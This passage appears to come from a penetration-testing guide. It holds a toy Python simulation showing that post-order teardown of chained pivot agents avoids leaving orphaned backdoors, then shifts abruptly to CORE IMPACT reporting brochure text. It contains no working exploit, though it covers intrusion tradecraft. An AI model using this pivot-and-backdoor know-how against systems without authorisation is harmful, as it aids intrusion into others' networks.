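    otherwise there is no route to the target and the command is lost."""
    target, relays = path[-1], path[:-1]
    if target.alive and all(r.alive for r in relays):
        target.alive = False
        return True
    return False


def cleanup(root, postorder=True):
    """Uninstall an Agent chain; returns (removed_hosts, orphaned_hosts) in order of attempt.
    postorder=True removes children before the Agent that relays them, which is the order that works."""
    removed, orphaned = [], []

    def walk(path):
        agent = path[-1]
        if not postorder:                                   # naive pre-order: parent first
            (removed if deliver_uninstall(path) else orphaned).append(agent.host)
        for child in agent.children:
            walk(path + [child])
        if postorder:                                       # post-order: after all descendants
            (removed if deliver_uninstall(path) else orphaned).append(agent.host)

    walk([root])
    return removed, orphaned


def build_chain():
    """Console -> dmz-web -> app-01 -> db-01, with app-02 also reached through dmz-web."""
    return Agent("dmz-web", [Agent("app-01", [Agent("db-01")]), Agent("app-02")])


if __name__ == "__main__":
    print("post-order:", cleanup(build_chain(), postorder=True))
    print("pre-order: ", cleanup(build_chain(), postorder=False))
```

The orphaned list from the pre-order run is the thing a tester must never hand back to a client: in-memory Agents die with a reboot, but until then they are live backdoors on hosts the console can no longer even see.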
23 Penetration Testing Report Generation
- CORE IMPACT generates clear, informative reports that provide data about targeted systems and applications, results of end-user penetration tests, audits of all exploits performed, and details about proven vulnerabilities. You can view and print reports using Crystal Reports or export them in popular formats such as HTML, PDF and Microsoft Word.
- Key Capabilities
- Obtain actionable information about exploited vulnerabilities, compromised end-user systems, web application weaknesses and associated risks
- Create activity audits to satisfy compliance and regulatory requirements
- Export report content in popular formats that can be easily customized and shared